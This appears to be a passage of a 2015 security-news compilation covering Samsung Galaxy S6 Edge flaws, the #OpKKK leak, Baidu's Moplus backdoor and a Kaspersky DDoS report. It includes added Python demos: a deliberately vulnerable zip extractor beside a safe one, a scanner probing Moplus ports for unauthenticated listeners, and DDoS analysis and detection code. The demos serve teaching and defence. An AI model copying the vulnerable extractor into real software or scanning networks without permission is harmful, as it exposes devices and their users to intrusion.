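As an added example, not code from the Project Zero post or from Samsung’s firmware (which is Java), the following Python reproduces the bug class in miniature: an archive whose entry name contains `..` is extracted by code that trusts the name, beside a hardened extractor that resolves each destination path and refuses the archive if any entry would land outside the target directory. The zip content and the temporary directories are constructed inline for the demonstration and stand in for the `cred.zip` the post describes.

```python
import io
import os
import tempfile
import zipfile


def build_traversal_zip() -> bytes:
    """Build, in memory, an archive with one benign entry and one entry whose
    name climbs two levels above the extraction directory (constructed
    sample input, not the cred.zip from the Samsung report)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("benign.txt", "harmless")
        zf.writestr("../../escaped.txt", "written outside the target dir")
    return buf.getvalue()


def unzip_naive(zip_bytes: bytes, dest: str) -> list:
    """Vulnerable pattern: joins the entry name onto dest without checking
    where the result lands, the same mistake as an unzip API that does not
    verify the file path. Returns the absolute paths it wrote."""
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            target = os.path.join(dest, info.filename)  # no containment check
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(os.path.realpath(target))
    return written


def unzip_safe(zip_bytes: bytes, dest: str) -> list:
    """Hardened extractor: resolve every destination path first and reject
    the whole archive if any entry would escape dest, so nothing is written
    before the check passes. Returns the absolute paths it wrote."""
    root = os.path.realpath(dest)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        planned = []
        for info in zf.infolist():
            target = os.path.realpath(os.path.join(root, info.filename))
            # commonpath is the containment test; a bare string-prefix compare
            # would wrongly accept /tmp/dest_evil as being inside /tmp/dest
            if os.path.commonpath([root, target]) != root:
                raise ValueError(f"path traversal rejected: {info.filename!r}")
            planned.append((info, target))
        for info, target in planned:
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
    return [t for info, t in planned if not info.is_dir()]


def demo() -> dict:
    """Run both extractors against the crafted archive inside a fresh temp
    tree and report what happened."""
    payload = build_traversal_zip()
    base = tempfile.mkdtemp(prefix="ziptraversal-")
    naive_dest = os.path.join(base, "naive", "extract")
    safe_dest = os.path.join(base, "safe", "extract")
    os.makedirs(naive_dest)
    os.makedirs(safe_dest)

    unzip_naive(payload, naive_dest)
    # "../../escaped.txt" resolved to <base>/escaped.txt, two levels up
    escaped = os.path.isfile(os.path.join(base, "escaped.txt"))

    rejected = False
    try:
        unzip_safe(payload, safe_dest)
    except ValueError:
        rejected = True
    # check-then-write: the benign entry must not have been written either
    partial_write = os.path.exists(os.path.join(safe_dest, "benign.txt"))

    return {"naive_escaped": escaped,
            "safe_rejected": rejected,
            "safe_partial_write": partial_write}


if __name__ == "__main__":
    print(demo())
```

The two-pass shape of `unzip_safe` matters as much as the check itself: validating entries one at a time while writing would still leave the benign entries on disk when a later entry is rejected, and on a device that is enough for an attacker to leave files behind.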

Another serious flaw (CVE-2015-7889) discovered by the team affects the email client installed on the Samsung Galaxy S6 Edge: an unprivileged application can, via a series of intents, cause the user’s emails to be forwarded to a different account. The experts also found a further vulnerability (CVE-2015-7893) in the email client that can be exploited to execute arbitrary JavaScript embedded in an email.

The experts explained that the device drivers and media processing were affected by several issues that they have quickly identified.

“We found issues very quickly in these areas through fuzzing and code review.” states the post.

The discovered issues are related to the image parsing (CVE-2015-7894, CVE-2015-7895, CVE-2015-7896, CVE-2015-7897, CVE-2015-7898) and the drivers (CVE-2015-7890, CVE-2015-7891, CVE-2015-7892).

The Project Zero team reported the security vulnerabilities to Samsung in July, the company has fixed eight flaws in October, the remaining ones will be fixed this month.

#opKKK Anonymous denied involvement in recent leak

#opKKK – The hacking collective Anonymous is denying involvement in the Monday leak of alleged Ku Klux Klan members that included several US senators.
A few days ago the Anonymous collective posted a video message on YouTube and a message on Twitter announcing that it holds a list of names of Ku Klux Klan members.
The collective announced the initiative under an operation dubbed #OpKKK, which started last year; the target in this phase is the Ghoul Squad, a group considered to be a KKK organization.
“We will release, to the global public, the identities of up to 1,000 Klan members, Ghoul Squad affiliates and other close associates of various factions of the Ku Klux Klan across the United States.”

Unfortunately, other groups or individuals within the collective are using the Anonymous brand for their own initiatives and to gain notoriety. As reported by The Register, a group calling itself “Anonymous” (PUTNAIOOACA) posted a message on Pastebin threatening to out members of the Ku Klux Klan as well.
“We will be revealing about 1000 of your klan member identities,” the PUTNAIOOACA group said. “We are not attacking you because of what you believe in as we fight for freedom of speech, We are attacking you because of what you do to our brothers and sisters.” “You messed with our family and now we will mess with yours.”
The PUTNAIOOACA group appears to be specifically interested in revealing the identities of KKK members working in institutions (law enforcement, politicians, and any public servant or government representative).

As promised, early this week someone disclosed online a list of alleged Ku Klux Klan members that included several US senators. The official @Operation_KKK account distanced itself from that disclosure in a post on Twitter.
The information, published on Pastebin by other groups claiming to belong to Anonymous but not part of #OpKKK, includes phone numbers and email addresses allegedly belonging to KKK members, together with the names of at least four US senators and five city mayors.


Clearly something went wrong. Some experts speculate that a faction of the collective has acted independently and wants to influence @Operation_KKK’s effort; others suspect that someone wants to use the Anonymous brand and the #OpKKK hashtag to launch a smear campaign against prominent personalities.
At the time of writing, Anonymous was inviting everyone to join it for an all-day town hall conversation on race, racism, terror and free speech (#OpKKK #HoodsOff).

For any information about #OpKKK, Anonymous refers people to the official @Operation_KKK Twitter account.

Hey guys, tomorrow November 5 is Guy Fawkes’ Day … what will happen?

Comprehensive protection of the corporate network with Kerio’s new UTM

The new UTM appliance Control Box NG100, launched by Kerio, is intended for the networks of smaller companies, ideally with up to ten users.

It is a relatively small but fully equipped solution for unified network security. It includes a firewall and router, intrusion detection and prevention (IPS), antivirus protection, VPN and content filtering.

The new device is aimed at smaller companies whose employees either work at a single location or are spread across small teams in different locations.

According to the manufacturer it protects and secures the network, users and data, and is also said to improve employee productivity.

The NG100 can be monitored and accessed at any time and from any device through the MyKerio centralized web management.

The device costs 14,688 CZK; the annual Software Maintenance is priced at 4,590 CZK.


More than 100 Million Android users at risk due to the Baidu Moplus SDK

A vulnerability known as Wormhole affects the Baidu Moplus SDK and potentially exposes more than 100 Million users to cyber attacks.
The Moplus software development kit (SDK) distributed by the Chinese Search Engine Baidu includes a functionality that can be exploited to gain access to the user’s device. The backdoor-like feature potentially exposes more than 100 Million Android users to cyber attacks.

“A vulnerability known as Wormhole that reportedly affected the software development kit (SDK), Moplus by Baidu is making waves due to the severity of the impact once successfully exploited. The said vulnerability was discovered by WooYun.org, a vulnerability reporting platform in China.” states a blog post published by TrendMicro. “However, as our investigation on this security bug unfolded, we found out that the Moplus SDK has backdoor functionalities that are not necessarily due or related to a vulnerability. “

The Wormhole vulnerability in the Moplus SDK allows an attacker to reach an unsecured, unauthenticated HTTP server on the user’s device; the server is started in the background without the user’s knowledge.

The Moplus SDK automatically starts this web server when an app built with the SDK is launched on the device. The server implements no authentication and accepts requests from any source. It listens on port 6259 or 40310, so an attacker can locate vulnerable devices simply by scanning a shared network for those open ports.

“… the notion that it is vulnerability-related when in actual this SDK has backdoor routines such as pushing phishing pages, inserting arbitrary contacts, sending fake SMS, uploading local files to remote servers, and installing any applications to the Android devices without user’s authorization. ” continues the post.

The Moplus SDK is already used by more than 14,000 Android apps, nearly 4,000 of them are developed by Baidu. These apps have been already downloaded by more than 100 Million Android users.

Baidu moplus SDK

The Moplus SDK allows an attacker to perform many actions including:

Send SMS messages
Make phone calls
Get mobile phone details
Add new contacts
Get a list of local apps
Download files on the device
Upload files from the device
Silently install other apps (if the phone is rooted)
Push Web pages
Get phone’s geo-location, and many more

The experts highlighted that the Wormhole flaw in the Moplus SDK is particularly dangerous because it is potentially easier to exploit than the Stagefright flaw: the attacker only needs to locate a vulnerable device exposing the open ports, with no user interaction required.
The researchers at Trend Micro have confirmed the existence in the wild of a specific malware, detected as ANDROIDOS_WORMHOLE.HRXA, which exploits Wormhole in the Moplus SDK.
The researchers reported the issue to Baidu and Google; the Chinese giant has already pushed a partial fix in a new release of the Moplus SDK.

Be aware, the new version of SDK doesn’t completely solve all problems, for example the HTTP server remains exposed online.

A few days ago another Chinese company was caught distributing a malicious SDK that included spying features: according to Palo Alto Networks, nearly 18,000 Android applications built with the Taomike SDK were found to include an SMS-stealing library.

Anonymous Hackers to Leak 1000 of KKK Members Details on Million Mask March (Nov 5, 2015)

The Online Hacktivist group Anonymous announced it plans to reveal the identities of about 1,000 Ku Klux Klan (KKK) members on 5th November, the day of the Global Protest movement known as the Million Mask March.
The Million Mask March is a global protest in which participants don Guy Fawkes masks in hundreds of cities around the world and march together against corrupt governments and corporations.
The Ku Klux Klan (KKK) is classified as a white supremacist racist group by the Anti-Defamation League and the Southern Poverty Law Center, and is estimated to have 5,000 to 8,000 members in total.
It was founded after the Civil War by former Confederate soldiers to fight against the reforms imposed by the North during Reconstruction.
“We've gained access to yet another KKK Twitter account. Using the info obtained, we will be revealing about 1000 Klan member identities.”, Anonymous Hackers tweeted last week.
The list of 1000 KKK Members, to be released on 5th November, apparently includes the names of US Politicians, according to the hackers affiliated with Anonymous — Operation KKK.
"You operate much more like terrorists, and you should be recognized as such. You are terrorists that hide your identities beneath sheets and infiltrate society on every level,” the hacker collective said.
"The privacy of the Ku Klux Klan no longer exists in cyberspace. You've had blood on your hands for nearly 200 years."
Yesterday another group of Anonymous hackers, not members of Operation KKK, published a first batch of (unverified) information on Pastebin, comprising a total of 57 phone numbers and 23 email addresses allegedly belonging to KKK members, along with the names of four US senators and five city mayors.
However, the hackers affiliated with Operation KKK deny any connection with that leak and promise to release their own list of 1,000 KKK members on 5 November.

Backdoor in Baidu Android SDK Puts 100 Million Devices at Risk

Baidu, China's Google-like search engine, distributes a software development kit (SDK) with functionality that can be abused to give backdoor-like access to a user's device, potentially exposing around 100 million Android users to malicious hackers.
The SDK in question is Moplus. It may not be directly available to the public, but it has already made its way into more than 14,000 Android apps, around 4,000 of which were created by Baidu itself.
Overall, the more than 100 million Android users who have installed these apps on their smartphones are at risk.
Security researchers at Trend Micro analyzed a vulnerability in the Moplus SDK, dubbed Wormhole, that lets attackers reach an unsecured, unauthenticated HTTP server on affected devices; the server runs silently in the background, without the user's knowledge.
This server uses no authentication and accepts requests from anyone who can reach it. An attacker who can send requests to the port of this hidden HTTP server can use it to execute malicious commands on the device.
Malicious Functionalities of Wormhole
Currently, the researchers have identified that the SDK is using the port 6259 or 40310 to perform malicious activities on affected Android devices, which includes:
Send SMS messages
Make phone calls
Get mobile phone details
Add new contacts
Get a list of local apps
Download files on the device
Upload files from the device
Silently install other apps (if the phone is rooted)
Push Web pages
Get phone's geo-location, and many more
Since the SDK automatically installs the Web server when a Moplus SDK app is opened, hackers just need to scan a mobile network for port 6259 or 40310, thereby finding vulnerable devices they can abuse.
Wormhole is More Dangerous than Stagefright
The vulnerability, according to researchers, is potentially easier to exploit than the Stagefright flaw, as Wormhole doesn't require social engineering to infect an unsuspecting user.
Trend Micro has also found at least one malware strain (detected as ANDROIDOS_WORMHOLE.HRXA) in the wild that takes advantage of Wormhole in Moplus SDK.
Researchers informed both Baidu as well as Google of the vulnerability.
As a result, Baidu has just pushed a partial fix for the problem by releasing a new version of the SDK that removed some of the SDK's functionality, but not all. The HTTP server remains online and active; however, Baidu assured its users that no backdoor exists now.
This isn't the first time a Chinese company has caught distributing malicious SDK. Just a few days ago, the Taomike SDK – one of the biggest mobile ad solutions in China – was caught secretly spying on users' SMS messages and uploading them to a server in China.
The same malicious functionality was discovered two weeks earlier in another SDK, developed by Youmi, which affected 256 iOS apps that used private APIs to collect users' private data; Apple eventually removed those apps from its App Store.
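Both Moplus write-ups above make the same operational point: the exposure is found by scanning for the two listening ports, and the server answers without credentials. As an added example (not Trend Micro's or Baidu's code), the Python below probes a list of hosts for those ports and sends a bare, unauthenticated GET to any listener it finds to record whether it answers without a 401/403 challenge. Since the SDK's command protocol is not described on this page, the block does not attempt to issue Moplus commands; instead it ships with a stand-in HTTP listener on the loopback interface, an assumption made so the scan can be exercised offline. The host list and the stand-in server are constructed for the demonstration.

```python
import socket
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Ports the Trend Micro write-up names for the Moplus SDK's hidden server.
MOPLUS_PORTS = (6259, 40310)


def port_open(host: str, port: int, timeout: float = 0.5) -> bool:
    """True if a TCP connection to host:port completes within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def answers_without_auth(host: str, port: int, timeout: float = 1.0) -> bool:
    """Send a bare GET / carrying no credentials and inspect the status line.
    Any HTTP status other than 401/403 means nothing gated the request."""
    request = b"GET / HTTP/1.0\r\nHost: " + host.encode() + b"\r\n\r\n"
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(request)
            status_line = s.recv(512).split(b"\r\n", 1)[0]
    except OSError:
        return False
    parts = status_line.split()
    return (len(parts) >= 2 and parts[0].startswith(b"HTTP/")
            and parts[1] not in (b"401", b"403"))


def scan(hosts, ports=MOPLUS_PORTS):
    """Return (host, port, unauthenticated) for every open port on each host."""
    findings = []
    for host in hosts:
        for port in ports:
            if port_open(host, port):
                findings.append((host, port, answers_without_auth(host, port)))
    return findings


class _StandIn(BaseHTTPRequestHandler):
    """Stand-in for the SDK's listener: answers every GET with 200 and no
    authentication challenge (an assumption made for this demo)."""

    def do_GET(self):
        body = b"ok"
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_stand_in_server(port: int = 0):
    """Start the stand-in on 127.0.0.1 (port 0 = any free port) in a daemon
    thread; returns (server, bound_port). Stop it with server.shutdown()
    followed by server.server_close()."""
    server = ThreadingHTTPServer(("127.0.0.1", port), _StandIn)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


if __name__ == "__main__":
    srv, bound = start_stand_in_server()
    try:
        for host, port, unauth in scan(["127.0.0.1"], ports=(bound,)):
            print(f"{host}:{port} open, answers unauthenticated: {unauth}")
    finally:
        srv.shutdown()
        srv.server_close()
```

Against a real network segment you would pass the handset addresses and leave `ports` at its default; an open port alone is only a lead, which is why the scan records the unauthenticated-response bit separately rather than treating every listener as confirmed.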

Kaspersky DDoS Intelligence Report Q3 2015
3.11.2015 Source: Kaspersky


Q3 events

Of all the Q3 2015 events in the world of DDoS attacks and the tools used to launch them, we picked out those that, in our opinion, best illustrate the main trends behind the evolution of these threats.

DDoS attacks targeting financial organizations for the purpose of extortion;
new techniques to increase the intensity of attacks by manipulating web pages;
active development of Linux-based botnets for DDoS attacks.
Attacks on financial organizations

In Q3 2015, there was increased activity by the cybercriminal group “DD4BC” responsible for a number of attacks on major banking organizations around the world. The group has been targeting banks, media groups and gaming companies since September, threatening to take down their customer websites unless they pay a ransom. The owner of the targeted resource is asked to pay between 25 and 200 bitcoins ($6,500 – $52,500), or have their servers disabled. Some of the first victims included organizations in Australia, New Zealand and Switzerland, while a warning was received by major financial institutions in Hong Kong. The Bank of China and the Bank of East Asia also reported that they were targeted by illegal activity. In the third quarter, a number of Russian financial institutions also received notifications from cybercriminals asking for a specific sum in cryptocurrency to terminate an attack.

Unusual attack scenario

CloudFlare reported a DDoS attack with an unusual scenario. A site belonging to one of CloudFlare’s customers was hit by 275,000 HTTP requests per second. Of particular interest was the fact that the attackers used malicious JavaScript embedded in adverts: an iframe containing a malicious advert with the JavaScript was rendered in the browsers of a large number of users, causing their workstations to send XHR requests to the victim. Experts believe that such malicious ads can also be displayed by some legitimate applications.

XOR DDoS bot activity

The specialists at Akamai Technologies witnessed growth in the capacity of a DDoS botnet consisting of Linux-based computers whose victims were mostly Asian sites belonging to educational institutions and gaming communities. A distinctive feature of the bot is the use of XOR-encryption both in the malicious program and for communication with the C&C servers. At the same time, in order to self-propagate the bot brute-forces passwords to the root account in Linux systems. Linux is often used as a server operating system, which means that the server also has the channel and computing resources that the attackers can use to launch DDoS attacks. Using SYN and DNS floods, this botnet has been successfully carrying out attacks with a capacity of 109-179 Gbps.

According to Kaspersky Lab data, the botnets from Linux-based servers infected by the XOR DDoS bot actively attacked resources located in China.

DDoS availability

On the one hand, the software that is used for DDoS attacks is becoming more complicated; on the other hand, the tools for DDoS attacks are becoming more freely available and easier to use. As a result, setting up and launching a DDoS attack no longer requires any special technical knowledge. A fairly competent criminal could easily unleash a powerful attack.

This fact is confirmed by attacks on the educational portal of the Republic of Tatarstan carried out by students attempting to block communication between teachers and parents. Throughout the year the attackers repeatedly tried to bring down the portal, which was protected by Kaspersky DDoS Protection. All their attempts were unsuccessful, but their persistence did succeed in attracting the attention of Kaspersky Lab’s experts.

The availability and ease of use of the tools for DDoS attacks has resulted in the range of targets growing. It is generally accepted that DDoS attacks are mainly focused on financial institutions, government agencies, businesses and the media. Now, however, any resource that has attracted the ire of an unscrupulous web user could be subjected to a DDoS attack – even an educational portal.

Statistics of botnet-assisted DDoS attacks


The DDoS Intelligence system (part of Kaspersky DDoS Protection) is designed to intercept and analyze commands sent to bots from command and control (C&C) servers, and does not have to wait until user devices are infected or cybercriminal commands are executed in order to gather data.

In this report, a single (separate) DDoS attack is defined as an incident during which any break in botnet activity lasts less than 24 hours. If the same web resource was attacked by the same botnet after a break of more than 24 hours, this is regarded as a separate DDoS attack. Attacks on the same web resource from two different botnets are also regarded as separate attacks.
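To make the counting rule concrete, here is an added Python example (not Kaspersky’s DDoS Intelligence code) that applies it to a constructed list of intercepted C&C commands: commands are grouped per (target, botnet), a gap of more than 24 hours between consecutive commands closes one attack and opens the next, and the same target hit by two botnets yields two attacks. It also computes per-day counts the way the report’s timeline footnote describes, counting a multi-day attack once for each day it spans. The timestamps, target addresses and botnet names are invented for the demonstration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Rule from the report: a pause in botnet activity of more than 24 hours
# against the same target splits one attack into two.
MAX_GAP = timedelta(hours=24)

# Constructed sample: (timestamp, target IP, botnet family) per intercepted
# C&C command. The addresses are documentation ranges, not real targets.
SAMPLE_COMMANDS = [
    ("2015-07-14 00:00", "203.0.113.10", "xor_ddos"),
    ("2015-07-14 12:00", "203.0.113.10", "xor_ddos"),
    ("2015-07-15 06:00", "203.0.113.10", "xor_ddos"),  # 18 h gap: same attack
    ("2015-07-17 08:00", "203.0.113.10", "xor_ddos"),  # 50 h gap: new attack
    ("2015-07-14 01:00", "203.0.113.10", "nitol"),     # other botnet: separate
    ("2015-09-22 09:00", "198.51.100.7", "xor_ddos"),
]


def parse_commands(rows):
    """Turn (text timestamp, target, botnet) rows into datetime-keyed tuples."""
    return [(datetime.strptime(ts, "%Y-%m-%d %H:%M"), target, botnet)
            for ts, target, botnet in rows]


def _attack(target, botnet, start, end):
    return {"target": target, "botnet": botnet, "start": start, "end": end,
            "hours": (end - start).total_seconds() / 3600}


def group_attacks(commands):
    """Group C&C commands into attacks. Returns one dict per attack with
    target, botnet, start, end and duration in hours."""
    per_key = defaultdict(list)
    for ts, target, botnet in commands:
        per_key[(target, botnet)].append(ts)

    attacks = []
    for (target, botnet), stamps in per_key.items():
        stamps.sort()
        start = prev = stamps[0]
        for ts in stamps[1:]:
            if ts - prev > MAX_GAP:           # break longer than a day
                attacks.append(_attack(target, botnet, start, prev))
                start = ts
            prev = ts
        attacks.append(_attack(target, botnet, start, prev))
    return attacks


def longest_attack_hours(attacks):
    return max(a["hours"] for a in attacks)


def attacks_per_day(attacks):
    """Daily counts as in the report's timeline: an attack spanning several
    days is counted once on each of those days."""
    counts = defaultdict(int)
    for a in attacks:
        day = a["start"].date()
        while day <= a["end"].date():
            counts[day] += 1
            day += timedelta(days=1)
    return dict(counts)


if __name__ == "__main__":
    found = group_attacks(parse_commands(SAMPLE_COMMANDS))
    for a in found:
        print(f'{a["target"]:14} {a["botnet"]:9} {a["start"]:%m-%d %H:%M} '
              f'-> {a["end"]:%m-%d %H:%M}  {a["hours"]:5.1f} h')
    print("longest:", longest_attack_hours(found), "h")
    print("per day:", attacks_per_day(found))
```

With the sample input the six commands collapse to four attacks (the 50-hour pause and the second botnet each open a new one), the longest runs 30 hours, and 14 July is counted twice in the daily timeline because two attacks were active that day. Note that per-day counting sums to more than the number of attacks, which is exactly the caveat the report attaches to its timeline chart.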

The geographical distribution of DDoS victims and C&C servers is determined according to their IP addresses. In this report, the number of DDoS targets is calculated based on the number of unique IP addresses reported in the quarterly statistics.

It is important to note that DDoS Intelligence statistics are limited to those botnets that were detected and analyzed by Kaspersky Lab. It should also be highlighted that botnets are just one of the tools used to carry out DDoS attacks; therefore, the data presented in this report does not cover every DDoS attack that has occurred within the specified time period.

Q3 Summary

In Q3 2015, botnet-assisted DDoS attacks targeted victims in 79 countries around the world.
91.6% of targeted resources were located in 10 countries.
The largest numbers of DDoS attacks targeted victims in China, the US and South Korea.
The longest DDoS attack in Q3 2015 lasted for 320 hours (or 13.3 days).
SYN DDoS, TCP DDoS and HTTP DDoS were the most common DDoS attack scenarios.
Linux-based bots are actively used by cybercriminals; the proportion of DDoS attacks from Linux-based botnets in the third quarter was 45.6%.
Geography of attacks

In Q3, the targets of DDoS attacks were located in 79 countries around the world. 91.6% of attacked resources were located in 10 countries.


Distribution of unique DDoS attack targets by country, Q3 vs Q2 2015

China still leads the Top 10 ranking: in Q3 2015, 34.5% of DDoS attack targets were located there, an increase of 4.6 percentage points (p.p.) on the previous quarter. The US came second with 20.8%. South Korea remained in third place (17.7%), although its share increased considerably, by 7.9 p.p.

The Netherlands (1.1%) re-entered the Top 10. A newcomer to the rating was Japan whose share accounted for 1.3% of all attacked resources. Germany (1.0%) and Hong Kong (0.9%) left the Top 10.

If we look at the number of reported attacks, 92.3% of all attacks (an increase of 14.7 p.p. on Q2) had targets within the same Top 10 countries:


Distribution of DDoS attack by countries, Q3 vs Q2 2015

In the third quarter, China (37.9%), the US (22.7%) and South Korea (14.1%) remained in the leading three places. The Netherlands (1.1%) and Japan (1.3%) pushed France (0.9%) and Hong Kong (0.9%) out of the Top 10 in terms of the number of attacks. The biggest increase in the proportion of DDoS attacks in Q3 was observed in the US – the share of attacks grew by 5.4 p.p.

The figures for the leading three countries in both rankings – the number of attacks and the number of targets – increased by more than they did for the other Top 10 countries. The continued leadership of China and the US in the rankings is due to cheap web hosting in those countries, which explains why so many targeted web resources are located there.

The absolute leader in terms of the number of attacks was an IP address allegedly belonging to a data center in Hong Kong: throughout the quarter it was attacked 22 times.

Changes in DDoS attack numbers

In Q3 2015, DDoS activity was distributed unevenly, with two peaks: the first fell in mid-July, the second in late September. The quietest period was from early August to mid-September.


Number of DDoS attacks over time* in Q3 2015.

* DDoS attacks may last for several days. In this timeline, the same attack may be counted several times, i.e. one time for each day of its duration.

The peak number of attacks in one day was 1344, recorded on 24 September.

Tuesday was the most active day of the week in terms of DDoS attacks.


Distribution of DDoS attack numbers by days of the week

The fact that Tuesday leads is probably due to a dramatic rise in the number of DDoS attacks on that day of the week on 14 July and on 22 September. Particularly active on those two days were botnets from Linux-based servers infected by the XOR DDoS bot that attacked resources in China.

Types and duration of DDoS attacks

99.3% of DDoS targets in Q3 2015 (vs. 98.2% in Q2) were attacked by bots belonging to one family.

In only 0.7% of all cases cybercriminals launched attacks using bots from two different families (or the clients used the services of several attack agents). In 0.2% of cases, three or more bots were used.

In Q3 2015, SYN DDoS (51.7%) remained the most popular attack method. TCP DDoS (16.4%) and HTTP DDOS (14.9%) were second and third respectively. ICMP-DDoS, whose contribution doubled over the last two quarters and accounted for 5.1%, was fourth.


The distribution of DDoS attacks by types

Once again, most attacks lasted no longer than 24 hours in Q3 2015. However, the number of attacks that lasted a week or longer increased considerably.


The distribution of DDoS attacks by duration (hours)

The longest DDoS attack in the previous quarter lasted for 205 hours (8.5 days); in Q3, this record was beaten by an attack that lasted 320 hours (13.3 days).

C&C servers and botnet types

In Q3 2015, South Korea took the lead in terms of the number of C&C servers located on its territory; its share grew from 34% to 56.6%. Noticeably, in South Korea this quarter the number of C&C servers that control Nitol bots increased significantly. Nitol began to use Dynamic DNS services more actively, in particular, no-ip.org and codns.com. As mentioned above, the percentage of DDoS attacks targeting resources located in South Korea also increased.

The proportion of C&C servers located in the US and China dropped significantly – from 21% to 12.4% and from 14% to 6.9% respectively.


Distribution of botnet C&C servers by countries in Q3 2015

The activity of Windows and Linux botnets continued to fluctuate. After the previous quarter’s reduction in the share of Linux-based botnets, in Q3 they regained ground – the proportion of attacks by Linux bots grew from 37.6% to 45.6%.


Correlation between attacks launched from Windows and Linux botnets

The increase in the proportion of Linux bot activity was most probably down to insufficient protection for Linux-based machines and, quite importantly, their higher Internet speeds. This makes Linux more attractive to cybercriminals despite the relative complexity in developing, acquiring and exploiting Linux bots.

Attacks on banks

The third quarter of 2015 saw the return of DDoS extortionists to the cybercrime scene. A number of major banking institutions in a variety of countries were targeted by DDoS attacks that were then followed by demands for a large payment in cryptocurrency to stop the attack. This particular aspect of the attacks suggests they are the work of the cybercriminal group DD4BC (Distributed Denial of Service for Bitcoin), which demands bitcoin ransoms.

It appears the group has now reached Russia, where a number of financial institutions were also attacked. Some of the Russian banks that were targeted were either protected by Kaspersky DDoS Protection or quickly connected to the service as soon as the DDoS attacks began. This meant they avoided any damage and the banks’ websites and online banking systems continued to function smoothly.

Kaspersky Lab registered a wave of lengthy DDoS attacks on the online banking systems of eight well-known financial institutions, with some banks repeatedly targeted.

In all of these attacks the cybercriminals used a combination of amplification techniques, which can take an online resource offline with minimal effort on the attacker's side.

Three types of attack were used to overload the channel: NTP amplification, SSDP amplification and RIPv1 amplification, which reached 40 Gbps. In some cases, the attacks were supplemented by an HTTPS flood that reached 150 Mbps from a botnet of about 2,000 attacking hosts.

The attacks lasted from one to four hours.
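The three reflection techniques named above share a signature that a network defender can look for: large UDP replies arriving from the amplifier's well-known source port (NTP 123, SSDP 1900, RIPv1 520) at a single victim, from many distinct reflector hosts. The following is an added example, not code from the Kaspersky report; the flow records are constructed, and the per-packet size threshold and the minimum reflector count are assumptions chosen for illustration.

```python
"""Flag UDP reflection/amplification traffic in flow records.

Added example (not from the Kaspersky report). The flow lines below are
constructed. Fields: timestamp proto src:sport dst:dport bytes packets.
Source ports 123 (NTP), 1900 (SSDP) and 520 (RIPv1) are the reflector
services named in the text; the thresholds are assumptions.
"""
from collections import defaultdict

AMP_PORTS = {123: "NTP", 1900: "SSDP", 520: "RIPv1"}

# Constructed sample: 198.51.100.5 is the victim, 203.0.113.x / 192.0.2.x
# are reflectors answering from amplifier ports with large payloads.
FLOWS = """\
1443000000 udp 203.0.113.10:123 198.51.100.5:41234 4680 10
1443000000 udp 203.0.113.11:123 198.51.100.5:41234 4680 10
1443000001 udp 203.0.113.12:123 198.51.100.5:41235 4680 10
1443000001 udp 192.0.2.20:1900 198.51.100.5:41236 3200 8
1443000001 udp 192.0.2.21:1900 198.51.100.5:41236 3200 8
1443000002 udp 192.0.2.30:520 198.51.100.5:520 2400 6
1443000002 udp 192.0.2.31:520 198.51.100.5:520 2400 6
1443000002 udp 192.0.2.32:520 198.51.100.5:520 2400 6
1443000003 udp 198.51.100.5:41234 203.0.113.10:123 48 1
1443000003 tcp 203.0.113.50:443 198.51.100.9:51000 1500 3
1443000004 udp 203.0.113.77:123 198.51.100.9:50000 90 1
"""


def parse_flow(line):
    """Split one flow line into a dict of typed fields."""
    ts, proto, src, dst, nbytes, pkts = line.split()
    sip, sport = src.rsplit(":", 1)
    dip, dport = dst.rsplit(":", 1)
    return {"ts": int(ts), "proto": proto, "sip": sip, "sport": int(sport),
            "dip": dip, "dport": int(dport), "bytes": int(nbytes), "pkts": int(pkts)}


def find_amplification(lines, min_reflectors=2, min_avg_pkt=400):
    """Return {dst_ip: {service: {"reflectors": n, "bytes": total}}} for
    destinations receiving large UDP replies from at least min_reflectors
    distinct hosts that answer from an amplifier port."""
    per_dst = defaultdict(lambda: defaultdict(lambda: {"reflectors": set(), "bytes": 0}))
    for line in lines.strip().splitlines():
        f = parse_flow(line)
        if f["proto"] != "udp" or f["sport"] not in AMP_PORTS:
            continue
        if f["bytes"] / f["pkts"] < min_avg_pkt:
            continue  # small replies look like ordinary client/server traffic
        bucket = per_dst[f["dip"]][AMP_PORTS[f["sport"]]]
        bucket["reflectors"].add(f["sip"])
        bucket["bytes"] += f["bytes"]

    result = {}
    for dip, services in per_dst.items():
        hits = {svc: {"reflectors": len(b["reflectors"]), "bytes": b["bytes"]}
                for svc, b in services.items()
                if len(b["reflectors"]) >= min_reflectors}
        if hits:
            result[dip] = hits
    return result


if __name__ == "__main__":
    for victim, services in find_amplification(FLOWS).items():
        for svc, info in services.items():
            print(f"{victim}: {svc} reflection from {info['reflectors']} hosts, "
                  f"{info['bytes']} bytes")
```

The per-packet size filter matters: a legitimate NTP client exchange is a few tens of bytes per packet, whereas monlist or SSDP M-SEARCH replies are several hundred bytes each, so the ratio separates a victim of reflection from a host that simply talks to a time server.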

The attackers not only demanded a bitcoin ransom but also threatened the banks with unprecedented terabit attacks. However, these threats have not been implemented in practice.

We can assume that the peak attack parameters registered at the end of September were the attackers’ maximum – Kaspersky Lab experts recorded this particular aggregate capacity in simultaneous attacks on several banks.

Unfortunately, this does not mean the power of attacks will not increase in the future.


The correlation between the number of attacks launched from Windows and Linux botnets marks an interesting trend, with criminals starting to actively use botnets from infected servers. There are several reasons for this.

Firstly, servers have a significantly bigger Internet channel than domestic machines, making it possible to organize powerful attacks with only a few C&C servers.

